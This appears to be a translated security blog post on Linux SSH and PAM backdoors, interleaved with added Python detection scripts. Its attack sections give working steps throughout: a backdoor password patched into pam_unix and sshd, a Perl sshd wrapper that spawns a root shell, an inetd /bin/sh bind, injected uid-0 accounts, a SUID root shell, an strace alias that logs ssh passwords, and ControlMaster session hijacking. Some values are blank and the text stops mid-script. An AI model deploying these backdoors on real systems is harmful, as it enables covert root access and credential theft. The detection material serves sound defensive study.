Linux UserSpace Back-Door, Rootkit SSH/PAM Backdoor Attack And Defensive Technology
1. Offensive and Defensive Viewpoints
0x1:For the Attacker
- Use System Builtin's to Simulate Rootkit Functionality. Stop relying on tools: "Master the environment.": be as unobtrusive as possible, i.e. disguise the rootkit as normal system tools and normal behaviour
- Everything Is A Weapon: wherever skill reaches, anything can serve as a blade; any feature of the operating system, given the right way of using and combining it, can very likely become an intrusion vector
0x2:For the Defender
- Know Your System, Before I Use it Against You. Thinking like an attacker: "Flip the evil bit."
- Know Your Enemy : Know Your System: the client-side battlefield is mainly the operating system layer, but it also includes the modules that interface with the system, such as web and remote login; only by understanding their features (especially high-performance and edge-case features) can a targeted defence be built
- Effectiveness != Complexity: offence and defence form one engineering project as a whole; a vulnerability in any single dimension can lead to compromise, so kernel-level security is not necessarily more important than application-level security: they are equally important. The effectiveness of a technique does not depend on its complexity
Relevant Link:
https://www.blacklodgeresearch.org/files/7613/6963/4840/Poor_Mans_Root_Kit_BLR_talk_PUBLIC_2013.pdf
2. SSH PAM Backdoor
PAM (Pluggable Authentication Module) is, simply put, a unified abstract interface for identity and password verification; application programmers use its APIs to implement security-related functionality. PAM serves as the unified verification entry point for Linux logins (including SSH), and for exactly that reason an attacker can use PAM to deploy a code-level logic backdoor for SSH.
0x1: Check the local PAM version
0x2: Download the matching source
http://pkgs.fedoraproject.org/repo/pkgs/pam/Linux-PAM-0.99.6.2.tar.bz2/52844c64efa6f8b6a9ed702eec341a4c/
http://www.linux-pam.org/pre/history/
http://www.linux-pam.org/pre/library/
0x3: Back up the original PAM .so file
cd /lib64/security
ll pam_unix.so
mv pam_unix.so pam_unix.so.bak
0x4: Modify the source file and add the logic backdoor
cd /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/modules/pam_unix
vim pam_unix_auth.c
0x5: Rebuild the PAM module
cd /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/
./configure
make
0x6: Replace the system's default PAM module with the module containing the logic backdoor
cp /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/modules/pam_unix/.libs/pam_unix.so /lib64/security/pam_unix.so
0x7: Test the backdoor
. Log in with the normal root account and password
. Log in with the root account and the backdoor password (pam) for a hidden login
0x8: Detection methods
pam_unix is a native system module, so RPM's verification mechanism can be used to detect tampering
. CentOS: use rpm to verify whether an installed package has been modified
rpm -qV pam
....L.... c /etc/pam.d/fingerprint-auth
....L.... c /etc/pam.d/password-auth
....L.... c /etc/pam.d/smartcard-auth
....L.... c /etc/pam.d/system-auth
S.?...... /lib64/libpam.so.0.82.
S.?...... /lib64/libpam_misc.so.0.82.
S.....T. /lib64/security/pam_unix.so
Meaning of the output:
/*
If everything verifies, nothing is printed; any discrepancy is shown. Output format:
1. An 8-character string: each character gives the comparison result of one file attribute against the RPM database ("." means the check passed)
1) S: file size
2) M: mode (permissions and file type)
3) 5: checksum (md5); ?: file unreadable
4) D: device
5) L: symbolic link
6) U: user
7) G: group
8) T: file modification time
2. c: marks a configuration file
3. file name
*/
. Ubuntu
dpkg -V libpam-modules
???????? c /etc/security/limits.conf
???????? /lib/x86_64-linux-gnu/security/pam_unix.so
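A small parser over that `rpm -qV` / `dpkg -V` output, added here as an example (it is not code from the original post). It ignores the routine `c` config-file drift shown above and reports only installed files whose content no longer matches the package database, which is exactly what a swapped `pam_unix.so` looks like. The sample lines, file names and the `libpam.so.0.82.1` version are constructed for the example:

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed samples modelled on the rpm -qV / dpkg -V output above
# (flags and file names are illustrative, not captured from a real host).
RPM_SAMPLE = """\
....L....  c /etc/pam.d/fingerprint-auth
....L....  c /etc/pam.d/system-auth
S.?......    /lib64/libpam.so.0.82.1
S.5....T.    /lib64/security/pam_unix.so
"""

DPKG_SAMPLE = """\
??5?????? c /etc/security/limits.conf
??5??????   /lib/x86_64-linux-gnu/security/pam_unix.so
"""

# Flags that mean the file *content* differs from the package: S size,
# 5 digest, T mtime.  '?' is deliberately not included: rpm uses it for
# "could not check" and dpkg prints it for every column it does not verify.
CONTENT_FLAGS = set("S5T")
LINE_RE = re.compile(r"^(\S+)\s+(?:(c)\s+)?(/\S+)\s*$")


@dataclass
class Finding:
    path: str
    flags: str
    is_config: bool


def parse_verify_output(text: str) -> list[Finding]:
    """Turn rpm -V / dpkg -V lines into Finding records; unrelated lines are skipped."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            flags, cfg, path = m.groups()
            findings.append(Finding(path, flags, cfg == "c"))
    return findings


def modified_binaries(text: str) -> list[Finding]:
    """Non-config files whose content no longer matches the package database.

    Config files (marked 'c') are expected to drift after local edits, so they
    are left out here; a replaced pam_unix.so has no such excuse."""
    hits = []
    for f in parse_verify_output(text):
        if f.is_config:
            continue
        if f.flags == "missing" or CONTENT_FLAGS & set(f.flags):
            hits.append(f)
    return hits


if __name__ == "__main__":
    for sample in (RPM_SAMPLE, DPKG_SAMPLE):
        for hit in modified_binaries(sample):
            print(f"content changed: {hit.path} ({hit.flags})")
```

On a real host feed it the output of `rpm -qV pam` or `dpkg -V libpam-modules`; a hit on a file under `security/` is the signal the post describes, and the flags column tells you whether size, digest or only the mtime moved.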
From the binary point of view, a .so file implanted with a code-level logic backdoor can be treated like a virus: extract a byte signature from around the backdoor logic, add it to the antivirus signature database, and this class of backdoor can be detected and removed, and blocked from being loaded by ssh
. Extract a signature from the pam_unix.so that contains the logic backdoor
. Add it to the antivirus signature database
. Prevent the backdoored pam_unix.so module from being loaded by the ssh process
Relevant Link:
http://www.csdn123.com/html/itweb/20130911/112822_112821_112829.htm
http://www.cnblogs.com/LittleHann/p/3662161.html
http://bobao.360.cn/learning/detail/454.html
http://www.awaysoft.com/taor/rpm%E6%A0%A1%E9%AA%8C%E5%B7%B2%E5%AE%89%E8%A3%85%E5%8C%85%E6%98%AF%E5%90%A6%E8%A2%AB%E4%BF%AE%E6%94%B9.html
3. SSHD Backdoor
0x1: Check the SSH version
ssh -V
OpenSSH_7.2p2 Ubuntu-4ubuntu2., OpenSSL 1.0.2g Mar
0x2: Download the SSH source package
Download and modify the sshd source
vi includes.h // set the backdoor password and the log file locations
/*
+#define ILOG "/tmp/ilog" // records usernames and passwords of logins to this host
+#define OLOG "/tmp/olog" // records usernames and passwords used to log in from this host to remote hosts
+#define SECRETPW "123456654321" // the backdoor password
*/
0x3: Insert the backdoor logic
- Use the configured backdoor password to bypass the authentication logic entirely
- Record the logins of root and other accounts, effectively a key logger
0x4: Restore the timestamp of sshd_config
touch -r sshd_config.bak sshd_config
0x5: Restart the service or reload the configuration
service sshd reload
0x6: Detection methods
- Binary signature detection
- Locate the target function dynamically through the ELF format
- Inside the target function, use ClamAV's style of signature-database matching: [signature:offset:length]
- Use the system's rpm verification to check the integrity of ssh
- Check the program for characteristic strings; backdoor logic deployed by an attacker usually carries a telltale string
- Try logging in over ssh with an arbitrary password to check whether a "passwordless logic backdoor" has been deployed, i.e. the attacker added a direct return statement to the decision logic, skipping every password check
Relevant Link:
http://www.freebuf.com/tools/10474.html
https://www.jianshu.com/p/b394528051c6
0x7: Abusing system service configuration files
Modify /etc/inetd.conf:
daytime stream tcp nowait /bin/sh sh –I
Replace inetd service programs such as in.telnetd and in.rexecd with trojaned programs, redirecting the login program.
4. Information Gathering from $HOME/.ssh/known_hosts
The $HOME/.ssh/ directory keeps this machine's ssh login history in known_hosts; from that file an attacker can directly obtain DMZ/VPC hosts or the usual next-hop IPs.
Once an attacker controls a user's machine, inspecting known_hosts may reveal the next jump host, intranet or DMZ machines this host connects to, thereby expanding the attack surface
Relevant Link:
https://www.defcon.org/images/defcon-15/dc15-presentations/Moore_and_Valsmith/Whitepaper/dc-15-moore_and_valsmith-WP.pdf
5. SSH Session Hijacking without Re-Authentication
Hijacking SSH By Setup A Tunnel Which Allows Multiple Sessions Over The Same SSH Connection Without Re-Authentication
0x1: Characteristics of SSH multiplexing
Multiplexing is the ability to send more than one signal over a single line or connection.
With multiplexing, OpenSSH can re-use an existing TCP connection for multiple concurrent SSH sessions rather than creating a new one each time.
0x2:Setting Up Multiplexing
It must be understood that SSH hijacking takes place on the machine the attacker controls; through it the attacker hopes to obtain, without a password, the remote ssh sessions the current user is connected to.
The configuration files the attacker modifies are those on the controlled user's machine.
1. Modify the ssh configuration [attacker has root]
vim /etc/ssh/ssh_config
/*
..
ControlPath /tmp/%r@%h:%p
ControlMaster auto
ControlPersist yes
..
*/
With ControlMaster mode enabled, once the current user has logged in successfully to a target machine (for example a remote jump host or a DMZ machine), the attacker can use multiplexing to log in to that same server "without a password".
In short, SSH password verification happens at the level of the TCP connection, not of the session; when multiplexing is in effect, the attacker's session simply bypasses every login check.
2. Modify the ssh configuration [attacker has no root]
vim $HOME/.ssh/config
/*
..
ControlPath /tmp/%r@%h:%p
ControlMaster auto
ControlPersist yes
..
*/
3. Modify the ssh configuration [wrap the ssh command in .bashrc]
vim $HOME/.bashrc
/*
..
ssh ()
{
/usr/bin/ssh -o "ControlMaster=auto" -o "ControlPath=/tmp/%r@%h:%p" -o "ControlPersist=yes" "$@";
}
..
*/
This uses bash's user-defined functions together with ssh's dynamic configuration options to switch on ControlMaster mode.
0x3: The attacker reuses the multiplexed socket to open SSH connections
This socket can be used to create further sessions, without credentials, even after the original user exits their session.
0x4: Detection methods
- Check whether ControlMaster mode is enabled in the ssh configuration files
- /etc/ssh/ssh_config
- $HOME/.ssh/config
- Check whether a bash user-defined function hijacks ssh()
- set | grep "ssh()"
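The configuration check above, written out as a parser for the two files named, added here as an example (not code from the original post). It reads `ssh_config`-style files (keyword/value, `=` or whitespace separated, comments dropped, `Host`/`Match` blocks tracked) and reports any `ControlMaster` other than `no`, any `ControlPersist` that keeps the socket alive after logout, and a `ControlPath` placed under a world-writable directory such as `/tmp`, which is what the `/tmp/%r@%h:%p` setting above does. The sample config is constructed; the `jump` host and its address are invented:

```python
from __future__ import annotations

import os
import re

# Constructed sample: the multiplexing block from the post placed in the global
# section, followed by a benign Host entry (host name and IP invented).
SAMPLE_CONFIG = """\
# added by an intruder
ControlPath /tmp/%r@%h:%p
ControlMaster auto
ControlPersist yes

Host jump
    HostName 10.0.0.5
    User admin
"""

KEYVAL_RE = re.compile(r"^(\w+)\s*[=\s]\s*(.+)$")


def parse_ssh_config(text: str) -> list[tuple[str, str, str]]:
    """Return (host_block, keyword, value) triples.

    Keywords are case-insensitive in ssh_config, so they are lower-cased;
    options seen before any Host/Match line are reported under '*'."""
    out, host = [], "*"
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = KEYVAL_RE.match(line)
        if not m:
            continue
        key, val = m.group(1).lower(), m.group(2).strip()
        if key in ("host", "match"):
            host = val
        out.append((host, key, val))
    return out


def multiplexing_findings(text: str) -> list[str]:
    """Human-readable findings for the three Control* options."""
    findings = []
    for host, key, val in parse_ssh_config(text):
        low = val.lower()
        if key == "controlmaster" and low != "no":
            findings.append(f"{host}: ControlMaster={val}")
        elif key == "controlpersist" and low != "no":
            findings.append(f"{host}: ControlPersist={val} (socket survives logout)")
        elif key == "controlpath" and low.startswith(("/tmp/", "/dev/shm/", "/var/tmp/")):
            findings.append(f"{host}: ControlPath={val} (world-writable directory)")
    return findings


def check_files(paths=("/etc/ssh/ssh_config", "~/.ssh/config")) -> dict[str, list[str]]:
    """Run the check over the real client config files; missing files are skipped."""
    report = {}
    for p in paths:
        full = os.path.expanduser(p)
        if os.path.isfile(full):
            with open(full, encoding="utf-8", errors="replace") as fh:
                report[full] = multiplexing_findings(fh.read())
    return report


if __name__ == "__main__":
    for line in multiplexing_findings(SAMPLE_CONFIG):
        print(line)
    for path, findings in check_files().items():
        print(path, findings or "clean")
```

Note that `ControlMaster auto` is a legitimate speed-up that many administrators set themselves; the combination with `ControlPersist yes` and a socket under `/tmp` is what turns it into the hijack described above, so treat the three findings together rather than alerting on the first alone.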
Relevant Link:
https://en.wikibooks.org/wiki/OpenSSH/Cookbook/Multiplexing
http://unix.stackexchange.com/questions/22965/limits-of-ssh-multiplexing
http://www.anchor.com.au/blog/2010/02/ssh-controlmaster-the-good-the-bad-the-ugly/
http://www.revsys.com/writings/quicktips/ssh-faster-connections.html
6. Hijacking Active SSH Screen Sessions
The scenario where the user ssh_user manages ssh sessions with screen
When ssh_user runs
screen ssh root@112.124.20.20
to connect to the remote host 112.124.20.20, a corresponding file appears under /var/run/screen.
ls -la /var/run/screen/
The session can be taken over with screen -r root/
The drawback of injecting into a screen ssh session is that the commands you type are displayed simultaneously at the currently connected user's end, so it is easily noticed
0x1: Detection methods
- Check whether /var/run/screen/ contains screen sessions; to some extent this counts as a suspicious event
Relevant Link:
http://0xthem.blogspot.com/2015/03/hijacking-ssh-to-inject-port-forwards.html
http://drops.wooyun.org/tips/5253
7. Dynamic tunnel in an existing SSH session
We can create a dynamic tunnel inside an existing master socket
lsof -i TCP:9090
ssh -O forward -D 9090 -S /tmp/root@112.124.20.20\:22 %h
lsof -i TCP:9090
Injecting this command sets up port forwarding; once it has run, port 9090 on this machine can be used as a SOCKS5 proxy to reach the next-hop network. No new TCP session is created; the old ssh session is reused, so it can be thought of as an ssh tunnel.
As noted earlier, when ControlPersist is yes the socket file is not removed automatically; we can rm /tmp/root@112.124.20.20\:22 by hand, or more gracefully use
ssh -O exit -S /tmp/root@112.124.20.20\:22 %h
8. A password-free root SSH backdoor via the SSH PAM authentication mechanism
0x1: Procedure
On the controlled server run the following command, which creates a symbolic link named su pointing at sshd.
ln -sf /usr/sbin/sshd /tmp/su;nohup /tmp/su -oPort= &
Then open a new login session as root with any password; the login succeeds directly.
Note that the controlled server (the one carrying the ssh backdoor) must be configured to "permit root login" and to "use PAM authentication".
0x2: How it works
When a process named su starts and triggers auth verification (similar to running su xxx at the command line), the system reads the configuration in /etc/pam.d/su.
Taking Ubuntu as an example,
root@iZuf651jh0tfb2bx32x9lpZ:~# cat /etc/pam.d/su
#
# The PAM configuration file for the Shadow `su' service
#

# This allows root to su without passwords (normal operation)
auth       sufficient pam_rootok.so

# Uncomment this to force users to be a member of group root
# before they can use `su'. You can also add "group=foo"
# to the end of this line if you want to use a group other
# than the default "root" (but this may have side effect of
# denying "root" user, unless she's a member of "foo" or explicitly
# permitted earlier by e.g. "sufficient pam_rootok.so").
# (Replaces the `SU_WHEEL_ONLY' option from login.defs)
# auth       required   pam_wheel.so

# Uncomment this if you want wheel members to be able to
# su without a password.
# auth       sufficient pam_wheel.so trust

# Uncomment this if you want members of a specific group to not
# be allowed to use su at all.
# auth       required   pam_wheel.so deny group=nosu

# Uncomment and edit /etc/security/time.conf if you need to set
# time restrainst on su usage.
# (Replaces the `PORTTIME_CHECKS_ENAB' option from login.defs
# as well as /etc/porttime)
# account    requisite  pam_time.so

# This module parses environment configuration file(s)
# and also allows you to use an extended config
# file /etc/security/pam_env.conf.
#
# parsing /etc/environment needs "readenv=1"
session       required   pam_env.so readenv=1
# locale variables are also kept into /etc/default/locale in etch
# reading this file *in addition to /etc/environment* does not hurt
session       required   pam_env.so readenv=1 envfile=/etc/default/locale

# Defines the MAIL environment variable
# However, userdel also needs MAIL_DIR and MAIL_FILE variables
# in /etc/login.defs to make sure that removing a user
# also removes the user's mail spool file.
# See comments in /etc/login.defs
#
# "nopen" stands to avoid reporting new mail when su'ing to another user
session    optional   pam_mail.so nopen

# Sets up user limits according to /etc/security/limits.conf
# (Replaces the use of /etc/limits in old login)
session    required   pam_limits.so

# The standard Unix authentication modules, used with
# NIS (man nsswitch) as well as normal /etc/passwd and
# /etc/shadow entries.
@include common-auth
@include common-account
@include common-session
The key line is:
auth sufficient pam_rootok.so
sufficient means that as soon as this line is satisfied, authentication returns success immediately.
The Linux man page description of pam_rootok.so
Looking at the pam_rootok.so source,
the key part is the highlighted code: the module calls getuid(); if the returned uid is 0, it then checks whether the SELinux root is 0 (or is 0 with SELinux enabled); if it is 0, authentication succeeds, otherwise it fails.
Normally, when the root account runs su, password verification is skipped outright; that is the intended purpose of this mechanism.
Here, however, the attacker symlinks sshd to a process named su, borrowing su's password-free check for root to obtain a password-free ssh backdoor.
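A process-table check for this trick, added here as an example (not code from the original post). The kernel sets a process's `comm` from the file name passed to `execve`, so an sshd started through a link named `su` shows up with `comm` = `su` while `/proc/<pid>/exe` still resolves to the real sshd binary; that mismatch, or an sshd executable living under `/tmp`, is what the function flags. The process table below is constructed (pids and paths invented); `live_procs()` reads the real one on Linux:

```python
from __future__ import annotations

import os
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    comm: str   # /proc/<pid>/comm: the name PAM's service lookup ends up using
    exe: str    # resolved target of /proc/<pid>/exe


# Constructed process table: a normal sshd, a normal su, the post's trick
# (sshd executed through a link named su) and an sshd copied into /tmp.
SAMPLE_PROCS = [
    Proc(812, "sshd", "/usr/sbin/sshd"),
    Proc(2210, "su", "/usr/bin/su"),
    Proc(3344, "su", "/usr/sbin/sshd"),
    Proc(4001, "sshd", "/tmp/sshd"),
]

SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def suspicious_sshd(procs: list[Proc]) -> list[Proc]:
    """sshd processes whose command name is not 'sshd', or that run from a scratch dir.

    An sshd whose comm is 'su' authenticates against /etc/pam.d/su, where
    pam_rootok.so is 'sufficient', instead of /etc/pam.d/sshd."""
    hits = []
    for p in procs:
        exe = p.exe.replace(" (deleted)", "")   # readlink marks unlinked binaries this way
        if os.path.basename(exe) != "sshd":
            continue
        if p.comm != "sshd" or exe.startswith(SCRATCH_DIRS):
            hits.append(p)
    return hits


def live_procs() -> list[Proc]:
    """Read the process table from /proc (Linux only); entries we cannot read are skipped."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue   # kernel threads, races with exiting processes, or no permission
        procs.append(Proc(int(pid), comm, exe))
    return procs


if __name__ == "__main__":
    table = live_procs() if os.path.isdir("/proc") else SAMPLE_PROCS
    for p in suspicious_sshd(table):
        print(f"pid {p.pid}: comm={p.comm!r} exe={p.exe}")
```

Run it as root so that every `/proc/<pid>/exe` link is readable; as an unprivileged user only your own processes resolve and the check is silently incomplete.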
Relevant Link:
https://www.freebuf.com/articles/system/138753.html
9. An sshd Backdoor Implemented in Perl
0x1: Backdoor implementation
Back up the original /usr/sbin/sshd and replace it with the following perl script,
#!/usr/bin/perl
exec"/bin/sh"if(getpeername(STDIN)=~/^..zf/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;
- exec"/bin/sh"if(getpeername(STDIN)=~/^..zf/): if the current STDIN file handle is a socket and the remote end's source port is 31334 (in big-endian network byte order this is the hex string \x00\x00zf, which the perl regex ..zf matches), then execute /bin/sh and end the current program (the second line is never reached); this effectively hands a root shell (sshd runs as root) to the remote socket
- exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV: start the sshd service (/usr/bin/sshd is the real sshd), passing every argument given to /usr/sbin/sshd (the backdoor) through to the real sshd (this line keeps the ssh service working normally for ordinary users, so logins show nothing unusual)
0x2: Deployment
# move the real sshd to /usr/bin/sshd
mv /usr/sbin/sshd /usr/bin/sshd
# place the backdoor sshd (the perl script) at /usr/sbin/sshd and make it executable
chmod +x /usr/sbin/sshd
# restart the ssh service
/etc/init.d/ssh restart
# on the control end, initiate the backdoor connection:
socat STDIO TCP4:10.1.100.3:,sourceport=
This command redirects standard input and output to a socket connected to 10.1.100.3: (the ip of the machine carrying the sshd backdoor). In the backdoor perl script STDIN is therefore a socket, and that socket's source port is 31334
# this command is equivalent to
socat -TCP4:10.1.100.3:,sourceport=
In this way a shell on the controlled system is obtained with no authentication at all (the root shell is spawned before the sshd authentication stage is ever reached), which is to say an ssh backdoor.
For better concealment, copy /bin/sh to /bin/sshd and change the backdoor source to:
#!/usr/bin/perl
exec"/bin/sshd"if(getpeername(STDIN)=~/^..zf/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;
When the control end connects again and inspects the network connections, it sees a process named sshd holding an open socket handle.
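An on-disk check for the sshd binary that covers both the patched-source backdoor of section 3 (its `/tmp/ilog` and `/tmp/olog` strings) and the perl replacement of this section, added here as an example (not code from the original post). It reads the file, tells an ELF binary from a `#!` script, and runs a `strings(1)`-style extraction over the bytes to look for a watchlist of indicator strings; the two indicators are the paths defined in the post's `includes.h`, and the three file contents are constructed stand-ins rather than real binaries:

```python
from __future__ import annotations

import os
import re
from dataclasses import dataclass, field

ELF_MAGIC = b"\x7fELF"
# Indicator strings taken from the patched includes.h in section 3; a real
# watchlist would be built from known samples.
INDICATORS = [b"/tmp/ilog", b"/tmp/olog"]


@dataclass
class Report:
    is_elf: bool
    is_script: bool
    interpreter: str | None
    matched: list[bytes] = field(default_factory=list)


def printable_strings(data: bytes, min_len: int = 4) -> list[bytes]:
    """Same idea as strings(1): runs of printable ASCII at least min_len long."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


def inspect_sshd(data: bytes) -> Report:
    """Classify the file contents and match the extracted strings against INDICATORS."""
    is_elf = data.startswith(ELF_MAGIC)
    is_script = data.startswith(b"#!")
    interp = None
    if is_script:
        interp = data.split(b"\n", 1)[0][2:].strip().decode(errors="replace")
    strs = printable_strings(data)
    matched = [ind for ind in INDICATORS if any(ind in s for s in strs)]
    return Report(is_elf, is_script, interp, matched)


def verdict(r: Report) -> str:
    if r.is_script:
        return f"REPLACED: sshd is a {r.interpreter} script, not an ELF binary"
    if not r.is_elf:
        return "REPLACED: sshd is not an ELF binary"
    if r.matched:
        return "SUSPECT: backdoor indicators " + ", ".join(m.decode() for m in r.matched)
    return "no findings"


# Constructed file contents standing in for /usr/sbin/sshd (not real binaries):
# a minimal ELF-looking blob, the same blob with the section 3 strings added,
# and a perl script of the kind this section describes.
CLEAN = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9 + b"OpenSSH_7.2p2\x00/etc/ssh/sshd_config\x00"
PATCHED = CLEAN + b"/tmp/ilog\x00/tmp/olog\x00"
PERL = b'#!/usr/bin/perl\nexec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;\n'


def inspect_path(path: str = "/usr/sbin/sshd") -> str | None:
    """Verdict for a real file, or None when it is absent."""
    if not os.path.isfile(path):
        return None
    with open(path, "rb") as fh:
        return verdict(inspect_sshd(fh.read()))


if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("patched", PATCHED), ("perl", PERL)):
        print(f"{name}: {verdict(inspect_sshd(blob))}")
    print("/usr/sbin/sshd:", inspect_path() or "not present")
```

String matching is the cheapest of the checks listed in section 3's 0x6 and the easiest for an attacker to defeat, so pair it with the package-manager verification from section 2 and the file-type check here, which catches the perl swap no matter what strings it carries.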
Relevant Link:
https://www.freebuf.com/articles/system/140880.html
10. Adding Backdoor System Accounts
0x1: Windows hidden $ accounts
0x2: Adding a Linux root superuser
echo "mx7krshell:x:0:0::/:/bin/sh" >> /etc/passwd
If the system does not allow uid=0 users to log in remotely, add an ordinary user account instead
echo "mx7krshell::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
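An audit of `/etc/passwd` and `/etc/shadow` for the two entries just shown, added here as an example (not code from the original post). It reports any second uid 0 account, any passwd entry with an empty password field, and any shadow entry whose hash field is empty, which is what the injected shadow line amounts to. The excerpts are constructed (the `alice` and `daemon` entries and the hash values are invented); `audit_system()` runs the same checks over the real files when they are readable:

```python
from __future__ import annotations

import os

# Constructed excerpts that include the two injected entries from the post.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mx7krshell:x:0:0::/:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""

SHADOW = """\
root:$6$saltsalt$hashhashhash:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
mx7krshell::-1:-1:-1:-1:-1:-1:500
alice:$6$saltsalt$otherhash:18000:0:99999:7:::
"""


def audit_passwd(text: str) -> list[str]:
    """Flag extra uid 0 accounts and empty password fields in passwd(5) lines."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split(":")
        if len(parts) != 7:
            findings.append(f"passwd line {n}: malformed ({len(parts)} fields)")
            continue
        name, pw, uid, _gid, _gecos, _home, shell = parts
        if uid == "0" and name != "root":
            findings.append(f"passwd: extra uid 0 account '{name}' with shell {shell}")
        if pw == "":
            findings.append(f"passwd: '{name}' has an empty password field")
    return findings


def audit_shadow(text: str) -> list[str]:
    """Flag shadow(5) entries with no hash (password-less login) or a wrong field count."""
    findings = []
    for line in text.splitlines():
        parts = line.split(":")
        name = parts[0]
        hashed = parts[1] if len(parts) > 1 else ""
        if hashed == "":
            findings.append(f"shadow: '{name}' has no password hash (login without password)")
        if len(parts) != 9:
            findings.append(f"shadow: '{name}' has {len(parts)} fields, expected 9")
    return findings


def audit_system() -> list[str]:
    """Apply both audits to the live files; shadow needs root to be readable."""
    out = []
    for path, fn in (("/etc/passwd", audit_passwd), ("/etc/shadow", audit_shadow)):
        if os.access(path, os.R_OK):
            with open(path, encoding="utf-8", errors="replace") as fh:
                out.extend(fn(fh.read()))
    return out


if __name__ == "__main__":
    for f in audit_passwd(PASSWD) + audit_shadow(SHADOW):
        print(f)
    print("live system:", audit_system() or "clean")
```

Counting fields is not pedantry: the injected shadow line has nine fields and so slips past a naive format check, and it is the empty second field, not the odd `-1` values, that lets the account in without a password.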
11. Set-bit (SUID) Backdoor
0x1: Planting a SUID shell
Any ordinary user running /dev/.rootshell on this machine obtains a root shell.
cp /bin/bash /dev/.rootshell
chmod u+s /dev/.rootshell
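A scan for the SUID shell described above, added here as an example (not code from the original post). `classify()` takes `(path, st_mode, st_uid)` triples and returns set-uid regular files sitting in directories where no legitimate set-uid binary lives, tagging root ownership and hidden names; `scan()` gathers those triples from the real filesystem with `os.lstat`. The listing below is constructed, and the `/tmp/bash` entry is invented to show a non-root set-uid file:

```python
from __future__ import annotations

import os
import stat

# Directories where a set-uid binary has no legitimate business (trailing
# slashes so that "/dev/" does not also match a path like "/device").
UNUSUAL_DIRS = ("/dev/", "/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def is_suid_file(mode: int) -> bool:
    """Regular file with the set-uid bit; directories and links are ignored."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def classify(entries: list[tuple[str, int, int]]) -> list[str]:
    """Set-uid regular files under UNUSUAL_DIRS, with ownership/hidden-name tags."""
    hits = []
    for path, mode, uid in entries:
        if not is_suid_file(mode) or not path.startswith(UNUSUAL_DIRS):
            continue
        tags = []
        if uid == 0:
            tags.append("root-owned")
        if os.path.basename(path).startswith("."):
            tags.append("hidden name")
        hits.append(path + (f" ({', '.join(tags)})" if tags else ""))
    return hits


def scan(roots: tuple[str, ...] = UNUSUAL_DIRS) -> list[str]:
    """Walk the real filesystem (lstat, so symlinks are not followed) and classify."""
    entries = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
            for name in files:
                p = os.path.join(dirpath, name)
                try:
                    st = os.lstat(p)
                except OSError:
                    continue
                entries.append((p, st.st_mode, st.st_uid))
    return classify(entries)


# Constructed listing; mode values are what os.lstat().st_mode would return.
SAMPLE = [
    ("/usr/bin/passwd", stat.S_IFREG | stat.S_ISUID | 0o755, 0),   # legitimate location
    ("/dev/.rootshell", stat.S_IFREG | stat.S_ISUID | 0o755, 0),   # the post's backdoor
    ("/tmp/bash", stat.S_IFREG | stat.S_ISUID | 0o755, 1000),      # invented, non-root
    ("/tmp/notes.txt", stat.S_IFREG | 0o644, 0),
]

if __name__ == "__main__":
    print(classify(SAMPLE))
    print(scan() or "no set-uid files in unusual directories")
```

`find / -perm -4000 -type f` gives the same raw list; the value of a script is the allow-list of expected locations, so that a new root-owned set-uid file under `/dev` stands out on its own instead of being buried among `passwd`, `sudo` and `mount`.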
12. Linux Environment Backdoors
0x1: alias backdoor
In .bashrc under the current user's home directory:
alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'
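A scan of shell start-up files for commands shadowed by a function or an alias, added here as an example (not code from the original post); it covers both the `ssh ()` function from section 5 and the `alias ssh=` above. The `set | grep "ssh()"` check from section 5 is worth supplementing because bash prints functions as `ssh () ` with a space before the parentheses, so that grep pattern does not match the very thing it looks for; the regexes here accept both spellings and the `function name` form. The sample `.bashrc` is constructed, and the `WATCHED` list and the set of start-up files are my choices:

```python
from __future__ import annotations

import os
import re

# Constructed ~/.bashrc containing both tricks from the post.
SAMPLE_BASHRC = r"""
export PATH=$HOME/bin:$PATH
alias ll='ls -alF'
ssh ()
{
    /usr/bin/ssh -o "ControlMaster=auto" -o "ControlPath=/tmp/%r@%h:%p" -o "ControlPersist=yes" "$@";
}
alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'
"""

# Commands whose redefinition in a start-up file deserves a look (my selection).
WATCHED = ("ssh", "scp", "sftp", "sudo", "su", "passwd")

# "name ()" / "name()" and "function name" definitions
FUNC_RE = re.compile(r"^\s*(?:function\s+(\w+)|(\w+)\s*\(\s*\))")
ALIAS_RE = re.compile(r"^\s*alias\s+(\w+)=(.*)$")


def shell_overrides(text: str, watched=WATCHED) -> list[tuple[int, str, str]]:
    """(line number, kind, name) for each function or alias that shadows a watched command."""
    out = []
    for n, line in enumerate(text.splitlines(), 1):
        m = FUNC_RE.match(line)
        if m:
            name = m.group(1) or m.group(2)
            if name in watched:
                out.append((n, "function", name))
            continue
        m = ALIAS_RE.match(line)
        if m and m.group(1) in watched:
            out.append((n, "alias", m.group(1)))
    return out


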